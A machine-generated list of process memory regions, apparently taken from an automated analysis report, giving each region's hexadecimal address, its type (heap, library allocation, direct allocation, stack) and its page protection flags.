trusted library allocation
page read and write
2434DA9B000
heap
page read and write
24357DA7000
trusted library allocation
page read and write
24358DF2000
trusted library allocation
page read and write
24357758000
heap
page read and write
2435C753000
trusted library allocation
page read and write
318B000
heap
page read and write
2435B4DF000
trusted library allocation
page read and write
2435BAF2000
trusted library allocation
page read and write
18EBA021000
trusted library allocation
page execute read
243683E4000
trusted library allocation
page read and write
24368141000
trusted library allocation
page read and write
2434DA84000
heap
page read and write
2434DAB2000
heap
page read and write
2435C9F5000
trusted library allocation
page read and write
2435E12E000
trusted library allocation
page read and write
24365211000
trusted library allocation
page read and write
2435C767000
trusted library allocation
page read and write
2435C085000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2435B4DE000
trusted library allocation
page read and write
243574C8000
trusted library allocation
page read and write
2435DF88000
trusted library allocation
page read and write
2435C792000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2434DACA000
heap
page read and write
24368473000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
2435C071000
trusted library allocation
page read and write
2435E0F4000
trusted library allocation
page read and write
184C7E31000
heap
page read and write
2435EFE1000
trusted library allocation
page read and write
2435E1EE000
trusted library allocation
page read and write
243638B5000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
2435C8F0000
trusted library allocation
page read and write
2435E0F4000
trusted library allocation
page read and write
24358FF3000
trusted library allocation
page read and write
37F3000
heap
page read and write
2435DD71000
trusted library allocation
page read and write
2435C8A6000
trusted library allocation
page read and write
243658BD000
trusted library allocation
page read and write
2435D0E7000
trusted library allocation
page read and write
2435E267000
trusted library allocation
page read and write
2435E2ED000
trusted library allocation
page read and write
243577B1000
heap
page read and write
24368494000
trusted library allocation
page read and write
2435DF88000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2434DAB6000
heap
page read and write
2434DAB0000
heap
page read and write
2BB2000
heap
page read and write
2435E0E2000
trusted library allocation
page read and write
243658D9000
trusted library allocation
page read and write
2435B6F0000
trusted library allocation
page read and write
24369336000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
2434DA78000
heap
page read and write
24358F64000
trusted library allocation
page read and write
1F527550000
heap
page read and write
243689FC000
trusted library allocation
page read and write
243655E3000
trusted library allocation
page read and write
2435C7DF000
trusted library allocation
page read and write
2435DF32000
trusted library allocation
page read and write
2435DFD1000
trusted library allocation
page read and write
B695000
heap
page read and write
1B6B000
heap
page read and write
2435DFA7000
trusted library allocation
page read and write
2435E06D000
trusted library allocation
page read and write
2435E1F8000
trusted library allocation
page read and write
243683D9000
trusted library allocation
page read and write
2435E1F6000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435C7A6000
trusted library allocation
page read and write
25EFE500000
trusted library allocation
page read and write
D41000
unkown
page execute read
2435DF21000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
3BC0000
direct allocation
page read and write
2435C74B000
trusted library allocation
page read and write
2435B79B000
trusted library allocation
page read and write
2435C729000
trusted library allocation
page read and write
2435B4EE000
trusted library allocation
page read and write
17FD000
stack
page read and write
2435B8D2000
trusted library allocation
page read and write
243653D6000
trusted library allocation
page read and write
243633CE000
trusted library allocation
page read and write
2435B89E000
trusted library allocation
page read and write
BAE9000
heap
page read and write
2435C9E6000
trusted library allocation
page read and write
25EFE110000
heap
page read and write
2435C8F0000
trusted library allocation
page read and write
6BE000
stack
page read and write
184C7200000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2434DA89000
heap
page read and write
2435C7EB000
trusted library allocation
page read and write
2435C792000
trusted library allocation
page read and write
2435DF36000
trusted library allocation
page read and write
2435B4E2000
trusted library allocation
page read and write
3232000
heap
page read and write
3C10000
direct allocation
page read and write
184C7E3F000
heap
page read and write
2434DA7D000
heap
page read and write
B479000
heap
page read and write
BAA8000
heap
page read and write
243680ED000
trusted library allocation
page read and write
2435DE55000
trusted library allocation
page read and write
2435DF44000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2434DAB0000
heap
page read and write
2435C98B000
trusted library allocation
page read and write
2435DDBB000
trusted library allocation
page read and write
243652CA000
trusted library allocation
page read and write
ED047FE000
stack
page read and write
243689A1000
trusted library allocation
page read and write
2435EFBB000
trusted library allocation
page read and write
3C00000
direct allocation
page read and write
2435E1EE000
trusted library allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
2436938E000
trusted library allocation
page read and write
25EFE513000
trusted library allocation
page read and write
25EFDF80000
unclassified section
page readonly
2435E250000
trusted library allocation
page read and write
2435DD90000
trusted library allocation
page read and write
3CC0000
direct allocation
page read and write
2435B7CA000
trusted library allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
2435EFA5000
trusted library allocation
page read and write
2435E137000
trusted library allocation
page read and write
24368958000
trusted library allocation
page read and write
3A60000
direct allocation
page read and write
400000
unkown
page readonly
2435E4F6000
trusted library allocation
page read and write
2435DF2D000
trusted library allocation
page read and write
24364D15000
trusted library allocation
page read and write
2435E1F8000
trusted library allocation
page read and write
24368494000
trusted library allocation
page read and write
243637F7000
trusted library allocation
page read and write
2435E45F000
trusted library allocation
page read and write
46824B8000
stack
page read and write
2435C792000
trusted library allocation
page read and write
2435E1F6000
trusted library allocation
page read and write
2435E0DD000
trusted library allocation
page read and write
2412000
heap
page read and write
2435E1EC000
trusted library allocation
page read and write
2435CC14000
trusted library allocation
page read and write
24365858000
trusted library allocation
page read and write
2434DAE1000
heap
page read and write
2435BA70000
trusted library allocation
page read and write
2435EFEE000
trusted library allocation
page read and write
243658D6000
trusted library allocation
page read and write
2435E24E000
trusted library allocation
page read and write
2435B89E000
trusted library allocation
page read and write
24357CF6000
trusted library allocation
page read and write
2A6D000
heap
page read and write
2435DE4F000
trusted library allocation
page read and write
2435DEEB000
trusted library allocation
page read and write
3851000
heap
page read and write
2435E248000
trusted library allocation
page read and write
24365858000
trusted library allocation
page read and write
2435E1C3000
trusted library allocation
page read and write
2435C729000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
243577B1000
heap
page read and write
2435CD7D000
trusted library allocation
page read and write
184C7D4A000
unkown
page execute read
2435B7CA000
trusted library allocation
page read and write
243577B6000
heap
page read and write
2435B78A000
trusted library allocation
page read and write
25EFE511000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
2435E217000
trusted library allocation
page read and write
2436374A000
trusted library allocation
page read and write
2435E11F000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
2434DAB6000
heap
page read and write
2436966F000
heap
page read and write
2434DA9B000
heap
page read and write
425A000
direct allocation
page read and write
24358DC3000
trusted library allocation
page read and write
243652EB000
trusted library allocation
page read and write
243689F2000
trusted library allocation
page read and write
3872000
heap
page read and write
1F52775B000
trusted library allocation
page read and write
2435ED6E000
trusted library allocation
page read and write
243654D8000
trusted library allocation
page read and write
2435EF5C000
trusted library allocation
page read and write
3097000
heap
page read and write
243656C5000
trusted library allocation
page read and write
2435C82D000
trusted library allocation
page read and write
184C7900000
trusted library allocation
page read and write
243638AB000
trusted library allocation
page read and write
2435E140000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2434DAD0000
heap
page read and write
184C70F0000
trusted library allocation
page read and write
2436387A000
trusted library allocation
page read and write
4BDE000
stack
page read and write
2900000
heap
page read and write
2435DF81000
trusted library allocation
page read and write
2435BA65000
trusted library allocation
page read and write
2663000
heap
page read and write
243680C4000
trusted library allocation
page read and write
24368979000
trusted library allocation
page read and write
2435DF07000
trusted library allocation
page read and write
1F52755A000
heap
page read and write
3095000
heap
page read and write
2434DACA000
heap
page read and write
243684B2000
trusted library allocation
page read and write
2434DA77000
heap
page read and write
2435B67E000
trusted library allocation
page read and write
2435DF39000
trusted library allocation
page read and write
2435C8F0000
trusted library allocation
page read and write
2435E2E3000
trusted library allocation
page read and write
2435ED1B000
trusted library allocation
page read and write
2435EFC7000
trusted library allocation
page read and write
380F000
heap
page read and write
24358F6D000
trusted library allocation
page read and write
24369651000
heap
page read and write
2435938B000
trusted library allocation
page read and write
25EFE5F4000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
2436373A000
trusted library allocation
page read and write
243593B2000
trusted library allocation
page read and write
2435E28B000
trusted library allocation
page read and write
173D000
stack
page read and write
2435EFFA000
trusted library allocation
page read and write
2435E22C000
trusted library allocation
page read and write
2436389F000
trusted library allocation
page read and write
24368375000
trusted library allocation
page read and write
119E000
unkown
page read and write
2435E26F000
trusted library allocation
page read and write
1299000
unkown
page readonly
2435DFDF000
trusted library allocation
page read and write
243577CA000
heap
page read and write
2435DF97000
trusted library allocation
page read and write
2435EF95000
trusted library allocation
page read and write
2435C0A8000
trusted library allocation
page read and write
2435EF9C000
trusted library allocation
page read and write
759000
heap
page read and write
2435B433000
trusted library allocation
page read and write
243689D4000
trusted library allocation
page read and write
2435EF91000
trusted library allocation
page read and write
243650B9000
trusted library allocation
page read and write
24368188000
trusted library allocation
page read and write
24357DE4000
trusted library allocation
page read and write
2435EF0B000
trusted library allocation
page read and write
2435DEE1000
trusted library allocation
page read and write
2435DCA7000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
24358F64000
trusted library allocation
page read and write
2435EF27000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
2435B79B000
trusted library allocation
page read and write
2435EDC7000
trusted library allocation
page read and write
2435EFC3000
trusted library allocation
page read and write
243654F8000
trusted library allocation
page read and write
3831000
heap
page read and write
2435EF44000
trusted library allocation
page read and write
C51000
unkown
page execute read
2435C8E0000
trusted library allocation
page read and write
295A9D07000
trusted library allocation
page read and write
2435E0FA000
trusted library allocation
page read and write
2435DD82000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435C080000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2435B4E6000
trusted library allocation
page read and write
872000
unkown
page readonly
2435C9F0000
trusted library allocation
page read and write
24363723000
trusted library allocation
page read and write
243658F6000
trusted library allocation
page read and write
243638C4000
trusted library allocation
page read and write
24358FF6000
trusted library allocation
page read and write
BEA0000
direct allocation
page read and write
DA0000
heap
page read and write
2435C767000
trusted library allocation
page read and write
2435DF7E000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
24363871000
trusted library allocation
page read and write
4D14000
heap
page read and write
2434DAB5000
heap
page read and write
2435E2ED000
trusted library allocation
page read and write
2435E167000
trusted library allocation
page read and write
2435E0B9000
trusted library allocation
page read and write
243683CC000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
243680FA000
trusted library allocation
page read and write
2436848A000
trusted library allocation
page read and write
2940000
heap
page read and write
24363871000
trusted library allocation
page read and write
2435DFE2000
trusted library allocation
page read and write
2435B7A1000
trusted library allocation
page read and write
2435EFC7000
trusted library allocation
page read and write
2BC0000
heap
page read and write
2435B881000
trusted library allocation
page read and write
2435C967000
trusted library allocation
page read and write
2435DED1000
trusted library allocation
page read and write
2435BA41000
trusted library allocation
page read and write
24363400000
trusted library allocation
page read and write
243574EF000
trusted library allocation
page read and write
2435E463000
trusted library allocation
page read and write
C50000
unkown
page readonly
2435DDBB000
trusted library allocation
page read and write
2435BA65000
trusted library allocation
page read and write
243683DE000
trusted library allocation
page read and write
2434DAC6000
heap
page read and write
24368377000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
2435DD4B000
trusted library allocation
page read and write
2BB2000
heap
page read and write
243683AE000
trusted library allocation
page read and write
2435BA93000
trusted library allocation
page read and write
243680D0000
trusted library allocation
page read and write
2435DF36000
trusted library allocation
page read and write
3AF0000
direct allocation
page read and write
2435CC00000
trusted library allocation
page read and write
763000
heap
page read and write
2435ED34000
trusted library allocation
page read and write
2435C753000
trusted library allocation
page read and write
24365410000
trusted library allocation
page read and write
2436370D000
trusted library allocation
page read and write
243656CC000
trusted library allocation
page read and write
24368AAC000
trusted library allocation
page read and write
2435C749000
trusted library allocation
page read and write
24365441000
trusted library allocation
page read and write
184C7223000
trusted library allocation
page read and write
2435B4A5000
trusted library allocation
page read and write
2435C8E8000
trusted library allocation
page read and write
24369300000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2435E225000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2434DA90000
heap
page read and write
2435BAF4000
trusted library allocation
page read and write
1F52776E000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
2640000
heap
page read and write
2435B4E2000
trusted library allocation
page read and write
2435C792000
trusted library allocation
page read and write
2435EF67000
trusted library allocation
page read and write
243653D8000
trusted library allocation
page read and write
24365678000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2434DA85000
heap
page read and write
243652C1000
trusted library allocation
page read and write
243577E9000
heap
page read and write
401000
unkown
page execute read
2434DA90000
heap
page read and write
24358F11000
trusted library allocation
page read and write
2435DFA3000
trusted library allocation
page read and write
2434DA78000
heap
page read and write
184C7E9A000
heap
page read and write
243652FC000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
2435DCB1000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
2435C0DD000
trusted library allocation
page read and write
2BB2000
heap
page read and write
243577D3000
heap
page read and write
2434DAB6000
heap
page read and write
1F527D5A000
heap
page read and write
2435B4C9000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2436372D000
trusted library allocation
page read and write
2435E1EC000
trusted library allocation
page read and write
25EFE1F0000
heap
page read and write
2435CC64000
trusted library allocation
page read and write
2434DADE000
heap
page read and write
2435B8C2000
trusted library allocation
page read and write
2435B479000
trusted library allocation
page read and write
2435CD75000
trusted library allocation
page read and write
2435E2E9000
trusted library allocation
page read and write
24358DC6000
trusted library allocation
page read and write
3B90000
direct allocation
page read and write
2435DF78000
trusted library allocation
page read and write
243683CC000
trusted library allocation
page read and write
25EFE579000
trusted library allocation
page read and write
2435C723000
trusted library allocation
page read and write
2435B4CB000
trusted library allocation
page read and write
386E000
heap
page read and write
2BB2000
heap
page read and write
2434DA90000
heap
page read and write
243654F9000
trusted library allocation
page read and write
2435C752000
trusted library allocation
page read and write
2436372B000
trusted library allocation
page read and write
2435ED70000
trusted library allocation
page read and write
2436963A000
heap
page read and write
2435EEC0000
trusted library allocation
page read and write
2435DFD5000
trusted library allocation
page read and write
243638B5000
trusted library allocation
page read and write
2435E0D3000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
B6E9000
heap
page read and write
3230000
heap
page read and write
243683C4000
trusted library allocation
page read and write
2435B47F000
trusted library allocation
page read and write
243680E3000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
2435DD90000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
243637E7000
trusted library allocation
page read and write
2435C06B000
trusted library allocation
page read and write
24358FC3000
trusted library allocation
page read and write
24358F11000
trusted library allocation
page read and write
2435D0AB000
trusted library allocation
page read and write
2435EF09000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2434DA9B000
heap
page read and write
184C7E08000
heap
page read and write
184C7203000
trusted library allocation
page read and write
243652F6000
trusted library allocation
page read and write
2435E1FE000
trusted library allocation
page read and write
2435B8AE000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2434DAB0000
heap
page read and write
2436542C000
trusted library allocation
page read and write
2435E225000
trusted library allocation
page read and write
2435B4CD000
trusted library allocation
page read and write
37D4000
heap
page read and write
243680C7000
trusted library allocation
page read and write
24357DFE000
trusted library allocation
page read and write
4CD0000
heap
page read and write
24358DDE000
trusted library allocation
page read and write
2435C8C3000
trusted library allocation
page read and write
2435C761000
trusted library allocation
page read and write
2436898B000
trusted library allocation
page read and write
2435C06E000
trusted library allocation
page read and write
2435ED2C000
trusted library allocation
page read and write
24365874000
trusted library allocation
page read and write
2435C75D000
trusted library allocation
page read and write
2435B876000
trusted library allocation
page read and write
2435B6E7000
trusted library allocation
page read and write
2435DD8B000
trusted library allocation
page read and write
75F000
heap
page read and write
2436938B000
trusted library allocation
page read and write
243681B7000
trusted library allocation
page read and write
24358DAD000
trusted library allocation
page read and write
3310000
direct allocation
page read and write
2435CB00000
trusted library allocation
page read and write
2435C096000
trusted library allocation
page read and write
2435DEC8000
trusted library allocation
page read and write
24368111000
trusted library allocation
page read and write
2435E15D000
trusted library allocation
page read and write
24363871000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
9A0000
heap
page read and write
2435E1EE000
trusted library allocation
page read and write
2B0D000
heap
page read and write
2434DA90000
heap
page read and write
1F5272F0000
unclassified section
page readonly
243684E1000
trusted library allocation
page read and write
24365413000
trusted library allocation
page read and write
2435C7C3000
trusted library allocation
page read and write
3BB0000
direct allocation
page read and write
2435EFA0000
trusted library allocation
page read and write
2BB2000
heap
page read and write
243680FA000
trusted library allocation
page read and write
309D000
heap
page read and write
38F0000
direct allocation
page read and write
3873000
heap
page read and write
2B0D000
heap
page read and write
2436387A000
trusted library allocation
page read and write
243684DB000
trusted library allocation
page read and write
E40000
heap
page read and write
2435C748000
trusted library allocation
page read and write
24365424000
trusted library allocation
page read and write
1E8C1440000
heap
page read and write
24363750000
trusted library allocation
page read and write
243684A4000
trusted library allocation
page read and write
2F50000
direct allocation
page read and write
2435E1FE000
trusted library allocation
page read and write
2435C7C3000
trusted library allocation
page read and write
2435CA80000
trusted library allocation
page read and write
2435E463000
trusted library allocation
page read and write
2435E11D000
trusted library allocation
page read and write
2434DAB4000
heap
page read and write
2435EF73000
trusted library allocation
page read and write
2435EF91000
trusted library allocation
page read and write
37D1000
heap
page read and write
2435EFA0000
trusted library allocation
page read and write
2435D4A8000
trusted library allocation
page read and write
243680C9000
trusted library allocation
page read and write
2434DA8E000
heap
page read and write
2434DACA000
heap
page read and write
24363400000
trusted library allocation
page read and write
2435ED6C000
trusted library allocation
page read and write
24359397000
trusted library allocation
page read and write
243681B7000
trusted library allocation
page read and write
243656C0000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
E05000
heap
page read and write
243680ED000
trusted library allocation
page read and write
2434D092000
heap
page read and write
2435C86E000
trusted library allocation
page read and write
243684A4000
trusted library allocation
page read and write
24368222000
trusted library allocation
page read and write
2435E18F000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
2435DB86000
trusted library allocation
page read and write
1F5273B0000
heap
page read and write
24359308000
trusted library allocation
page read and write
2435BA4F000
trusted library allocation
page read and write
24368A83000
trusted library allocation
page read and write
184C7EE7000
heap
page read and write
184C7DDA000
heap
page read and write
243683AE000
trusted library allocation
page read and write
3BD0000
direct allocation
page read and write
35B0000
direct allocation
page read and write
2435936C000
trusted library allocation
page read and write
2435E26A000
trusted library allocation
page read and write
2435C732000
trusted library allocation
page read and write
184C6FA0000
heap
page read and write
2435DEAE000
trusted library allocation
page read and write
2435D0ED000
trusted library allocation
page read and write
2435B7CA000
trusted library allocation
page read and write
2435B4F1000
trusted library allocation
page read and write
2436831D000
trusted library allocation
page read and write
243681D4000
trusted library allocation
page read and write
184C7EB4000
heap
page read and write
25EFE565000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435EDDC000
trusted library allocation
page read and write
2435DFD1000
trusted library allocation
page read and write
24358F90000
trusted library allocation
page read and write
3670000
direct allocation
page read and write
24358FFB000
trusted library allocation
page read and write
243638DF000
trusted library allocation
page read and write
2435B8E2000
trusted library allocation
page read and write
2435E2E7000
trusted library allocation
page read and write
3A10000
direct allocation
page read and write
37F7000
heap
page read and write
2BB2000
heap
page read and write
2435CC8B000
trusted library allocation
page read and write
24363830000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435B4CD000
trusted library allocation
page read and write
2AC3000
heap
page read and write
2435E13A000
trusted library allocation
page read and write
2435DE57000
trusted library allocation
page read and write
2435BA66000
trusted library allocation
page read and write
24363875000
trusted library allocation
page read and write
2435EE8C000
trusted library allocation
page read and write
2436897C000
trusted library allocation
page read and write
2435E0EA000
trusted library allocation
page read and write
2435BA41000
trusted library allocation
page read and write
243637E7000
trusted library allocation
page read and write
149D000
stack
page read and write
2435DFD1000
trusted library allocation
page read and write
243654B9000
trusted library allocation
page read and write
2434DAEA000
heap
page read and write
2435C732000
trusted library allocation
page read and write
25EFDFE0000
remote allocation
page read and write
2435B783000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24358F11000
trusted library allocation
page read and write
2435EFA5000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
1296000
unkown
page write copy
24368AAF000
trusted library allocation
page read and write
2435B4F1000
trusted library allocation
page read and write
184C7277000
trusted library allocation
page read and write
243652D3000
trusted library allocation
page read and write
184C7DCD000
heap
page read and write
2436382E000
trusted library allocation
page read and write
243577B4000
heap
page read and write
2435DFD1000
trusted library allocation
page read and write
24365850000
trusted library allocation
page read and write
2435DD90000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
2435B852000
trusted library allocation
page read and write
2435BA83000
trusted library allocation
page read and write
24358FF5000
trusted library allocation
page read and write
24368B09000
trusted library allocation
page read and write
B9F99CE000
stack
page read and write
2435B4A5000
trusted library allocation
page read and write
2435B89C000
trusted library allocation
page read and write
2435C72D000
trusted library allocation
page read and write
184C7790000
heap
page read and write
2BB2000
heap
page read and write
2436848A000
trusted library allocation
page read and write
2435B4B6000
trusted library allocation
page read and write
2435E254000
trusted library allocation
page read and write
24357D7F000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
243638A9000
trusted library allocation
page read and write
2435B6E7000
trusted library allocation
page read and write
25EFE5B1000
trusted library allocation
page read and write
184C721A000
trusted library allocation
page read and write
2435DF81000
trusted library allocation
page read and write
2435BA60000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
3872000
heap
page read and write
1F52751F000
unclassified section
page read and write
24368992000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
24359385000
trusted library allocation
page read and write
2435DED1000
trusted library allocation
page read and write
24358DC6000
trusted library allocation
page read and write
3CB0000
direct allocation
page read and write
2435B8E8000
trusted library allocation
page read and write
243684AC000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
2435CE9D000
trusted library allocation
page read and write
2B17000
heap
page read and write
243656C7000
trusted library allocation
page read and write
24368099000
trusted library allocation
page read and write
243680ED000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
1B10000
heap
page read and write
2435C94F000
trusted library allocation
page read and write
2435DD90000
trusted library allocation
page read and write
3870000
heap
page read and write
2435EE8C000
trusted library allocation
page read and write
B449000
heap
page read and write
243658BD000
trusted library allocation
page read and write
3BF0000
direct allocation
page read and write
2435BA6F000
trusted library allocation
page read and write
2434DAEA000
heap
page read and write
13DD000
stack
page read and write
2434DAB5000
heap
page read and write
2435DFD1000
trusted library allocation
page read and write
184C7E3F000
heap
page read and write
2435B8E2000
trusted library allocation
page read and write
2435B8DC000
trusted library allocation
page read and write
2435D046000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435D0A7000
trusted library allocation
page read and write
2435DF78000
trusted library allocation
page read and write
2435B88D000
trusted library allocation
page read and write
243683C4000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435CC56000
trusted library allocation
page read and write
2435BA4D000
trusted library allocation
page read and write
24365861000
trusted library allocation
page read and write
24369605000
heap
page read and write
2435E137000
trusted library allocation
page read and write
243684CC000
trusted library allocation
page read and write
2435E26A000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
24369430000
trusted library allocation
page read and write
B44B000
heap
page read and write
1F527747000
trusted library allocation
page read and write
2435DF9B000
trusted library allocation
page read and write
2435E24E000
trusted library allocation
page read and write
2435BACD000
trusted library allocation
page read and write
2435E246000
trusted library allocation
page read and write
2435E23F000
trusted library allocation
page read and write
2436848A000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
BAF3000
heap
page read and write
184C7DBC000
heap
page read and write
2435C7F5000
trusted library allocation
page read and write
2435DF8E000
trusted library allocation
page read and write
243652CA000
trusted library allocation
page read and write
2434DA78000
heap
page read and write
24368356000
trusted library allocation
page read and write
3254000
heap
page read and write
2434DABC000
heap
page read and write
243658E5000
trusted library allocation
page read and write
8B2C3FF000
stack
page read and write
2434DA78000
heap
page read and write
243653F8000
trusted library allocation
page read and write
2435C75F000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
2435EDCC000
trusted library allocation
page read and write
2435B4C9000
trusted library allocation
page read and write
3AB0000
direct allocation
page read and write
2435B473000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
2435C08C000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2434DABC000
heap
page read and write
2435BAEC000
trusted library allocation
page read and write
2436894E000
trusted library allocation
page read and write
2898000
stack
page read and write
2435EFEE000
trusted library allocation
page read and write
243658EE000
trusted library allocation
page read and write
2435E256000
trusted library allocation
page read and write
24368976000
trusted library allocation
page read and write
2435ED96000
trusted library allocation
page read and write
24368375000
trusted library allocation
page read and write
2435C815000
trusted library allocation
page read and write
2435BA4D000
trusted library allocation
page read and write
243655C1000
trusted library allocation
page read and write
30A1000
heap
page read and write
24365258000
trusted library allocation
page read and write
2F60000
direct allocation
page read and write
2435ED92000
trusted library allocation
page read and write
2435DFD1000
trusted library allocation
page read and write
2434DA7D000
heap
page read and write
2436849E000
trusted library allocation
page read and write
2435B7CA000
trusted library allocation
page read and write
2435E0F8000
trusted library allocation
page read and write
2435B6AC000
trusted library allocation
page read and write
2435C09F000
trusted library allocation
page read and write
2435E2FD000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24368369000
trusted library allocation
page read and write
1F527764000
trusted library allocation
page read and write
184C7E68000
unkown
page execute read
2435DFF4000
trusted library allocation
page read and write
2435EF91000
trusted library allocation
page read and write
184C6F60000
heap
page read and write
2436567C000
trusted library allocation
page read and write
24357C23000
trusted library allocation
page read and write
385A000
heap
page read and write
2435EE76000
trusted library allocation
page read and write
25EFE020000
heap
page read and write
24358F90000
trusted library allocation
page read and write
3217000
heap
page read and write
24358FF5000
trusted library allocation
page read and write
2434DA89000
heap
page read and write
2434DAB5000
heap
page read and write
2435B4C9000
trusted library allocation
page read and write
25EFE1D4000
heap
page read and write
2434DA7E000
heap
page read and write
31A7000
heap
page read and write
2435B4AE000
trusted library allocation
page read and write
243684D1000
trusted library allocation
page read and write
24358F34000
trusted library allocation
page read and write
2435E08D000
trusted library allocation
page read and write
2435DF5D000
trusted library allocation
page read and write
2435E285000
trusted library allocation
page read and write
2435CD7B000
trusted library allocation
page read and write
24368147000
trusted library allocation
page read and write
2435E1EA000
trusted library allocation
page read and write
2435BABB000
trusted library allocation
page read and write
46835FE000
stack
page read and write
2435E0E8000
trusted library allocation
page read and write
B50000
heap
page read and write
243654F2000
trusted library allocation
page read and write
2435DFC8000
trusted library allocation
page read and write
2435DF57000
trusted library allocation
page read and write
2434DA84000
heap
page read and write
2435C085000
trusted library allocation
page read and write
2436831F000
trusted library allocation
page read and write
2435B6A0000
trusted library allocation
page read and write
25EFE5B7000
trusted library allocation
page read and write
243574A7000
trusted library allocation
page read and write
2435E1F8000
trusted library allocation
page read and write
2435C0DD000
trusted library allocation
page read and write
24358FF3000
trusted library allocation
page read and write
2435E13C000
trusted library allocation
page read and write
2435E1C5000
trusted library allocation
page read and write
2435E2F3000
trusted library allocation
page read and write
4B5E000
stack
page read and write
2435C8E8000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
24357CF6000
trusted library allocation
page read and write
3261000
heap
page read and write
2A69000
heap
page read and write
4D18000
heap
page read and write
243680FE000
trusted library allocation
page read and write
184C7286000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2434DAB0000
heap
page read and write
24368375000
trusted library allocation
page read and write
BB1D000
heap
page read and write
2435BA88000
trusted library allocation
page read and write
2434DA84000
heap
page read and write
2435E250000
trusted library allocation
page read and write
3590000
direct allocation
page read and write
2436935D000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2436343C000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
3190000
heap
page read and write
243658E5000
trusted library allocation
page read and write
243689D2000
trusted library allocation
page read and write
2435EFF2000
trusted library allocation
page read and write
25EFE518000
trusted library allocation
page read and write
24368380000
trusted library allocation
page read and write
2434D0F7000
heap
page read and write
3193000
heap
page read and write
24358F0F000
trusted library allocation
page read and write
3690000
direct allocation
page read and write
2A40000
heap
page read and write
19D000
stack
page read and write
2435C757000
trusted library allocation
page read and write
C00000
heap
page read and write
24368097000
trusted library allocation
page read and write
24369601000
heap
page read and write
2434DA93000
heap
page read and write
2435930E000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435E137000
trusted library allocation
page read and write
2435C0E7000
trusted library allocation
page read and write
2435CC14000
trusted library allocation
page read and write
872000
unkown
page readonly
2435E2FB000
trusted library allocation
page read and write
184C7D40000
unkown
page execute read
2435DFE7000
trusted library allocation
page read and write
2435C0E0000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435E137000
trusted library allocation
page read and write
119F000
stack
page read and write
3A20000
direct allocation
page read and write
2435DE7F000
trusted library allocation
page read and write
3830000
direct allocation
page read and write
2435E2FD000
trusted library allocation
page read and write
2435EFFA000
trusted library allocation
page read and write
243593CB000
trusted library allocation
page read and write
24365495000
trusted library allocation
page read and write
2434DAB9000
heap
page read and write
24358DC3000
trusted library allocation
page read and write
2435B8A0000
trusted library allocation
page read and write
129E000
stack
page read and write
243680C2000
trusted library allocation
page read and write
A50000
heap
page read and write
2435DFA7000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24357CF6000
trusted library allocation
page read and write
2435C872000
trusted library allocation
page read and write
2435EF95000
trusted library allocation
page read and write
2435B4E0000
trusted library allocation
page read and write
2435EED7000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
2435BA41000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
BB17000
heap
page read and write
24358DB1000
trusted library allocation
page read and write
24358DB1000
trusted library allocation
page read and write
24363436000
trusted library allocation
page read and write
184C7E4C000
heap
page read and write
2435DF6E000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435EDC5000
trusted library allocation
page read and write
243689D6000
trusted library allocation
page read and write
